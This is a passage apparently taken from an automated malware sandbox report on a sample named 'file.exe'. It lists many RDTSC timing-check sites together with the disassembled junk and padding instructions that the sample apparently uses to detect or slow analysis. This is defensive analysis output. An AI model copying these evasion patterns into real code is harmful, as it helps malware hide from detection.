push eax 0x00000063 push edx 0x00000064 pushad 0x00000065 jmp 00007F1F18DC15D8h 0x0000006a pushad 0x0000006b popad 0x0000006c js 00007F1F18DC15C6h 0x00000072 push eax 0x00000073 push edx 0x00000074 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C5C6F2 second address: C5C6F6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C5C6F6 second address: C5C6FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C5CDAC second address: C5CDB2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C5CDB2 second address: C5CDB6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C5CDB6 second address: C5CDEA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c jmp 00007F1F1851F5E6h 0x00000011 jmp 00007F1F1851F5E1h 0x00000016 popad 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C5CDEA second address: C5CE03 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F1F18DC15CCh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C5D065 second address: C5D08D instructions: 0x00000000 rdtsc 0x00000002 ja 00007F1F1851F5D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jnl 00007F1F1851F5E7h 0x00000010 popad 0x00000011 push eax 0x00000012 push edi 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C5D08D second address: C5D0BC instructions: 0x00000000 rdtsc 0x00000002 jne 00007F1F18DC15C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edi 0x0000000b nop 0x0000000c mov edx, dword ptr [ebp+122D39DDh] 0x00000012 push 00000004h 0x00000014 mov edx, dword ptr [ebp+122D3979h] 0x0000001a nop 0x0000001b jmp 00007F1F18DC15CFh 0x00000020 push eax 0x00000021 push ebx 0x00000022 push esi 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C5D596 second address: C5D59F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C5D59F second address: C5D5B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 popad 0x00000006 push eax 0x00000007 pushad 0x00000008 jno 00007F1F18DC15CCh 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C5D5B7 second address: C5D5BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C5D760 second address: C5D766 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C5D766 second address: C5D76A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C5D76A second address: C5D76E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CA1967 second address: CA1985 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 jmp 00007F1F1851F5E8h 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CA1C47 second address: CA1C4D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CA1C4D second address: CA1C63 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F1F1851F5D6h 0x00000008 ja 00007F1F1851F5D6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pop ebx 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CA1C63 second address: CA1C67 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CA1F50 second address: CA1F7D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushad 0x00000007 jmp 00007F1F1851F5DAh 0x0000000c push edi 0x0000000d pop edi 0x0000000e pushad 0x0000000f popad 0x00000010 popad 0x00000011 jmp 00007F1F1851F5E7h 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CA1F7D second address: CA1F93 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F1F18DC15D2h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CA212C second address: CA2130 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CA3E20 second address: CA3E24 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CA9F33 second address: CA9F37 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C13A55 second address: C13A70 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 ja 00007F1F18DC15D2h 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C13A66 second address: C13A70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F1F1851F5D6h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CADF41 second address: CADF54 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F1F18DC15CAh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CADF54 second address: CADF58 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CADF58 second address: CADF8D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1F18DC15CDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F1F18DC15D7h 0x0000000f pop eax 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 pop edx 0x00000017 push eax 0x00000018 push edx 0x00000019 push esi 0x0000001a pop esi 0x0000001b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CADF8D second address: CADF91 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CADF91 second address: CADF97 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CADF97 second address: CADF9D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CADF9D second address: CADFB7 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F1F18DC15DCh 0x00000008 jmp 00007F1F18DC15D0h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CADFB7 second address: CADFC1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 push edx 0x00000009 pop edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CAE0CF second address: CAE0D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CAE0D8 second address: CAE0E4 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push edx 0x00000004 pop edx 0x00000005 push eax 0x00000006 pop eax 0x00000007 pop ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CAE0E4 second address: CAE0EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F1F18DC15C6h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CAFA99 second address: CAFAC0 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F1F1851F5D6h 0x00000008 je 00007F1F1851F5D6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 jmp 00007F1F1851F5E4h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CB3704 second address: CB3729 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1F18DC15D7h 0x00000009 pop ecx 0x0000000a push esi 0x0000000b jp 00007F1F18DC15C6h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CB2EE3 second address: CB2F1C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1F1851F5DFh 0x00000009 jnl 00007F1F1851F5D6h 0x0000000f jmp 00007F1F1851F5E3h 0x00000014 popad 0x00000015 jp 00007F1F1851F5DCh 0x0000001b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CB2F1C second address: CB2F46 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F1F18DC15D2h 0x00000008 jmp 00007F1F18DC15D0h 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 push edi 0x00000011 pop edi 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CBC34C second address: CBC350 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CBC350 second address: CBC35C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jbe 00007F1F18DC15C6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CBC35C second address: CBC386 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push edi 0x00000004 pop edi 0x00000005 jmp 00007F1F1851F5E5h 0x0000000a pop esi 0x0000000b pushad 0x0000000c jno 00007F1F1851F5D6h 0x00000012 js 00007F1F1851F5D6h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CBC4C8 second address: CBC4E7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jbe 00007F1F18DC15C6h 0x00000009 jmp 00007F1F18DC15D4h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CBC4E7 second address: CBC4ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CBC4ED second address: CBC501 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push esi 0x00000006 jl 00007F1F18DC15C6h 0x0000000c pop esi 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push ecx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CBC501 second address: CBC50E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 ja 00007F1F1851F5D6h 0x0000000c pop eax 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CBC67E second address: CBC695 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F1F18DC15D9h 0x00000008 jmp 00007F1F18DC15CDh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CBC824 second address: CBC82A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CBC96F second address: CBC986 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1F18DC15D1h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CBCB2A second address: CBCB36 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F1F1851F5DEh 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C5D288 second address: C5D28C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C5D28C second address: C5D2E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 nop 0x00000008 mov cl, 38h 0x0000000a push 00000004h 0x0000000c push 00000000h 0x0000000e push ebx 0x0000000f call 00007F1F1851F5D8h 0x00000014 pop ebx 0x00000015 mov dword ptr [esp+04h], ebx 0x00000019 add dword ptr [esp+04h], 00000014h 0x00000021 inc ebx 0x00000022 push ebx 0x00000023 ret 0x00000024 pop ebx 0x00000025 ret 0x00000026 nop 0x00000027 push edi 0x00000028 jo 00007F1F1851F5E1h 0x0000002e jmp 00007F1F1851F5DBh 0x00000033 pop edi 0x00000034 push eax 0x00000035 push eax 0x00000036 push edx 0x00000037 jmp 00007F1F1851F5E5h 0x0000003c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CBCCA5 second address: CBCCAF instructions: 0x00000000 rdtsc 0x00000002 jno 00007F1F18DC15C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CBCCAF second address: CBCCB4 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC4F80 second address: CC4F84 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC3054 second address: CC305D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC305D second address: CC3061 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC332F second address: CC3334 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC3334 second address: CC333A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC333A second address: CC3348 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC3348 second address: CC334C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC334C second address: CC3363 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F1F1851F5DBh 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC3363 second address: CC3383 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F1F18DC15D0h 0x0000000f jl 00007F1F18DC15C6h 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC3383 second address: CC3387 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC3387 second address: CC33A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 jmp 00007F1F18DC15D7h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC36CB second address: CC36DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC36DA second address: CC36E6 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F1F18DC15C6h 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC36E6 second address: CC3712 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1F1851F5DFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push esi 0x0000000b push edi 0x0000000c pop edi 0x0000000d pop esi 0x0000000e jg 00007F1F1851F5E8h 0x00000014 jmp 00007F1F1851F5DCh 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC3C83 second address: CC3C88 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC41EE second address: CC41F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC41F4 second address: CC41F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC4797 second address: CC47A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F1F1851F5D6h 0x0000000a pop ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e pop eax 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC8E8B second address: CC8EA1 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a ja 00007F1F18DC15C6h 0x00000010 je 00007F1F18DC15C6h 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC914C second address: CC9150 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC9150 second address: CC9158 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC92AC second address: CC92B2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC92B2 second address: CC92B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC92B6 second address: CC92BA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC92BA second address: CC9301 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F1F18DC15D3h 0x0000000c jmp 00007F1F18DC15D1h 0x00000011 popad 0x00000012 pop edx 0x00000013 pop eax 0x00000014 pushad 0x00000015 jmp 00007F1F18DC15D5h 0x0000001a pushad 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC9301 second address: CC930C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push esi 0x0000000a pop esi 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD02B9 second address: CD02BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD02BD second address: CD02D8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1F1851F5E7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD66E5 second address: CD6700 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1F18DC15CBh 0x00000007 push esi 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jl 00007F1F18DC15CEh 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD69B1 second address: CD69B5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD6B06 second address: CD6B0A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD6B0A second address: CD6B26 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 je 00007F1F1851F5D6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jng 00007F1F1851F5DAh 0x00000012 push edx 0x00000013 pop edx 0x00000014 pushad 0x00000015 popad 0x00000016 pop ecx 0x00000017 push eax 0x00000018 push edx 0x00000019 push edi 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD6B26 second address: CD6B33 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push ebx 0x00000006 jnp 00007F1F18DC15C6h 0x0000000c pop ebx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD6B33 second address: CD6B43 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F1F1851F5D8h 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD6B43 second address: CD6B47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD6C8B second address: CD6C91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD6DF5 second address: CD6E04 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1F18DC15CBh 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CDAE36 second address: CDAE4C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1F1851F5E2h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CDF499 second address: CDF49D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CDF49D second address: CDF4A7 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F1F1851F5D6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CDF4A7 second address: CDF4BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F1F18DC15D0h 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CDF5F6 second address: CDF60B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jne 00007F1F1851F5DCh 0x0000000c push ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
